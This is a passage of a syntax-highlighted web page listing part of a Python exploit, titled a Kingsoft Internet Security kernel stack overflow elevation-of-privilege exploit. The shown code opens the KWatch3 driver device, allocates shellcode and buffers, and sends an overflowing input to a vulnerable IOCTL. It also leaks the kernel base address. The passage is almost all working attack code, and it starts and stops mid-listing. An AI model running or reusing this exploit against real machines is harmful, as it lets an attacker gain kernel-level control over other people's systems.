class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-112\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-113\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_trigger_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">GENERIC_READ<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">GENERIC_WRITE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OPEN_EXISTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">IOCTL_VULN<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">DEVICE_NAME<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\\\\.\\KWatch3&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwReturn<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">CreateFileA<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">DEVICE_NAME<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_READ<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_WRITE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OPEN_EXISTING<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x24242424<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x41414141<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outputbuffer_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc_shellcode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-131\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">IoStatusBlock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) sending stack overflow&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dev_ioctl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ZwDeviceIoControlFile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_handle<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">IoStatusBlock<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">IOCTL_VULN<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">inputbuffer<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">inputbuffer_size<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">outputbuffer<\/span><span class=\"crayon-sy\">_<\/span>size<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-148\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-149\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_leak_the_base<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-151\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;Get kernel base address.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-152\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;This function uses psapi!EnumDeviceDrivers which is only callable<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-153\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;from a non-restricted caller (medium integrity or higher). Also the<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-154\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;assumption is made that the kernel is the first array element returned.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-155\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-157\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) enumerating kernel base address&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulonglong *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">szDriver<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lpcbNeeded<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_long<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-164\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">windll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">psapi<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">EnumDeviceDrivers<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">lpcbNeeded<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) unable to get kernel base: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FormatError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># nt is the first one<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-173\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lpImageBase<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000000ffffffff<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-174\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-175\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-176\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nt&#8211;[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Steven Seeley (mr_me) of Source Incitern&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_leak_the_base<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 